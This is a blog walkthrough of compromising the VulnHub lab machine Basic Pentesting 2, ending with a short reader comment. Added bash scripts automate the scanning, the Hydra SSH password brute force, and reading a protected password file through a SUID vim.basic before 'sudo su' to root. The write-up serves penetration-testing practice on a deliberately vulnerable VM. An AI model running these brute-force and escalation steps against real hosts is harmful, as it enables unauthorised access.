In today’s post, I’ll be attacking a virtual machine downloaded from VulnHub called Basic Pentesting 2. I’ve previously posted two ways of exploiting a machine called Basic Pentesting, so it’s only right that we try out the next machine in the series!
The first thing we’re going to do is locate the vulnerable machine on our network. We can do this with a tool called netdiscover, which finds live hosts on the local segment by sending ARP requests. Once we find it, we can start scanning! For me, the vulnerable machine is located at 10.10.1.11, so let’s fire up nmap!
Alright, looking at these results we can see there is a web server running, so let’s browse to it and see what we find.
Nothing here, really! But let’s run a program called dirb to see if we can brute-force any hidden directory names on the web server.
Well, look at that! We discovered the development directory. When we browse to it, we can see two pretty interesting files.
From the first file, the bit of information that sticks out the most is that SMB is enabled! Let’s enumerate the service with enum4linux to see what information we can get back.
Found two users! This will surely come in handy. Before we try to find out what to do with this information, let’s have a look at the other file we found in the development directory of the web server.
Ah yes, here we go! The initials “J” and “K” line up with the users we found when enumerating SMB: Jan and Kay. Also, apparently Jan has a weak password! Let’s try to brute-force Jan’s SSH credentials with Hydra.
After running Hydra for a bit, we get a password back! Let’s login via SSH with the found credentials!
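The enumeration and brute-force chain from the steps above, collected into one script. This is an added example, not the post’s own commands (those are in the screenshots). The /24 is derived from the post’s 10.10.1.11; the interface name eth0 and the rockyou wordlist path are assumptions, the enum4linux sample output is constructed, and the commands that need the real tools and a live target only run when the script is called with --live.

```shell
#!/usr/bin/env bash
# Recon / initial-access chain for Basic Pentesting 2 as one script.
# Added example, not the post's own commands. TARGET comes from the
# post; IFACE and WORDLIST are assumptions (Kali defaults).
set -eu

TARGET="${TARGET:-10.10.1.11}"
IFACE="${IFACE:-eth0}"                                    # assumption
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"  # assumption
OUT="${OUT:-./loot}"

# Pull unique usernames out of enum4linux output. enum4linux reports the
# accounts it gets back over RPC as lines like "user:[jan] rid:[0x3e9]";
# keep only the name between the brackets and de-duplicate.
extract_smb_users() {
    sed -n 's/.*user:\[\([^]]*\)].*/\1/p' | sort -u
}

# How many parallel tasks to hand hydra. OpenSSH's MaxStartups starts
# dropping connections under a burst, so hydra itself recommends -t 4
# for ssh; more tasks just turn into false negatives ("not in list").
hydra_tasks_for() {
    case "$1" in
        ssh) echo 4 ;;
        *)   echo 16 ;;   # hydra's default
    esac
}

run_recon() {
    mkdir -p "$OUT"
    # 1. Find the box on the LAN. -P prints parse-friendly lines and
    #    stops after the active scan instead of running forever.
    sudo netdiscover -i "$IFACE" -P -r "${TARGET%.*}.0/24" | tee "$OUT/netdiscover.txt"
    # 2. Service scan: default scripts plus version detection.
    nmap -sC -sV -oN "$OUT/nmap.txt" "$TARGET"
    # 3. Directory brute force against the web server.
    dirb "http://$TARGET/" -o "$OUT/dirb.txt"
    # 4. SMB enumeration, then pull the user list out of it.
    enum4linux -a "$TARGET" | tee "$OUT/enum4linux.txt"
    extract_smb_users < "$OUT/enum4linux.txt" | tee "$OUT/users.txt"
    # 5. Brute-force SSH for the user the note says has a weak password.
    hydra -l jan -P "$WORDLIST" -t "$(hydra_tasks_for ssh)" "ssh://$TARGET" \
        | tee "$OUT/hydra.txt"
}

# Constructed sample of enum4linux's user section, so extract_smb_users
# can be exercised without a live target.
SAMPLE_ENUM_OUTPUT='
 ====================================
|    Users on 10.10.1.11    |
 ====================================
user:[kay] rid:[0x3e8]
user:[jan] rid:[0x3e9]

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
'

# Only touch the network when explicitly asked.
if [ "${1:-}" = "--live" ]; then
    run_recon
fi
```

Run it with `TARGET=10.10.1.11 ./recon.sh --live`; without the flag it only defines the functions, which is how the user-extraction step can be checked against the constructed sample. The -t 4 for SSH is the caveat worth remembering from this step: a too-aggressive Hydra run against sshd silently loses attempts, and the password looks like it was never in the list.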
Great, we’re in! Unfortunately, we don’t have root access yet, so it’s time to start looking around to see what we can find.
Browsing to the home directory and typing “ls”, we see that there are two folders: Jan and Kay. Well, we’re already the user Jan, so let’s see what’s in Kay’s folder!
Immediately, the file “pass.bak” sticks out to me. Any chance we can view the contents?
I guess that would have been too easy! Hmm, what now? Well, let’s check for SUID files that could be abused in order to escalate our privileges.
So here’s what we get. I had to do a little bit of research here to see if there was anything that could be used as a “low hanging fruit” method. Sure enough, I was directed towards vim.basic. A SUID editor runs with the privileges of the file’s owner rather than ours, so it can open files that our user can’t. So what if we were to use vim.basic in order to open that pass.bak file we couldn’t open?
Success! We found a pretty impressive password! Let’s switch over to the Kay user with our newly found password.
Okay, we have access to a new user, but we’re still not root. Let’s run a simple sudo -l to see what the user Kay is allowed to run through sudo.
So Kay can run any command as root via sudo! Let’s sudo su to root!
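The escalation steps above (SUID hunt, reading the protected file through the privileged editor, checking sudo) collected into one script, in the same spirit as the recon script. This is an added example, not the post’s own commands. The list of binaries that are set-uid on a stock install is an assumption based on a default Ubuntu/Debian box, the SUID listing used for the offline check is constructed, and the commands that need the target only run with --live.

```shell
#!/usr/bin/env bash
# Privilege-escalation triage for Basic Pentesting 2. Added example,
# not the post's own commands. STOCK_SUID is an assumption: what ships
# set-uid on a default Ubuntu/Debian install.
set -eu

STOCK_SUID="passwd chsh chfn gpasswd newgrp su sudo mount umount ping ping6 fusermount pkexec dbus-daemon-launch-helper ssh-keysign"

# Read SUID paths on stdin, print the ones whose basename is not stock.
# This is the "low hanging fruit" filter: anything left over is what to
# look up (GTFOBins-style) before spending time on the stock binaries.
triage_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        case " $STOCK_SUID " in
            *" $name "*) ;;                # known stock binary, skip
            *) printf '%s\n' "$path" ;;
        esac
    done
}

# Interpret one line of `sudo -l` output. "(ALL : ALL) ALL" (or the
# older "(ALL) ALL") means any command as any user, so `sudo su -` or
# `sudo -i` is the shortest path to root.
sudo_grants_all() {
    case "$1" in
        *"(ALL : ALL) ALL"*|*"(ALL) ALL"*) return 0 ;;
        *) return 1 ;;
    esac
}

run_live() {
    # 1. SUID search, then triage. Also list file capabilities: a
    #    binary with cap_setuid is root-equivalent without any SUID
    #    bit, and find -perm will never show it.
    find / -perm -4000 -type f 2>/dev/null | triage_suid
    getcap -r / 2>/dev/null
    # 2. Read the file we could not open, through the privileged editor.
    #    Interactive, as in the post:   vim.basic /home/kay/pass.bak
    #    Non-interactive dump of the same file into /tmp:
    vim.basic -es -c 'r /home/kay/pass.bak' -c 'w! /tmp/pass.bak' -c 'q!'
    # 3. After `su kay`, see what sudo allows; with an ALL entry:
    #      sudo -l
    #      sudo su -
}

# Constructed sample of a `find / -perm -4000 -type f` listing.
SAMPLE_SUID_LIST='/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/usr/bin/vim.basic
/usr/lib/openssh/ssh-keysign'

if [ "${1:-}" = "--live" ]; then
    run_live
fi
```

The triage function is the useful part: on a real host `find -perm -4000` returns a few dozen lines, almost all stock, and filtering those out leaves the one binary worth researching. The `getcap` line is the check this step should always include, since file capabilities are the other way a binary like vim.basic ends up able to act as root and they are invisible to a permissions-based search.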
There we go; root access! Another fun machine taken down!
Thanks for reading!
You’re so smart, keep up the good work 🙂
Love you xox
-your VERY proud girlfriend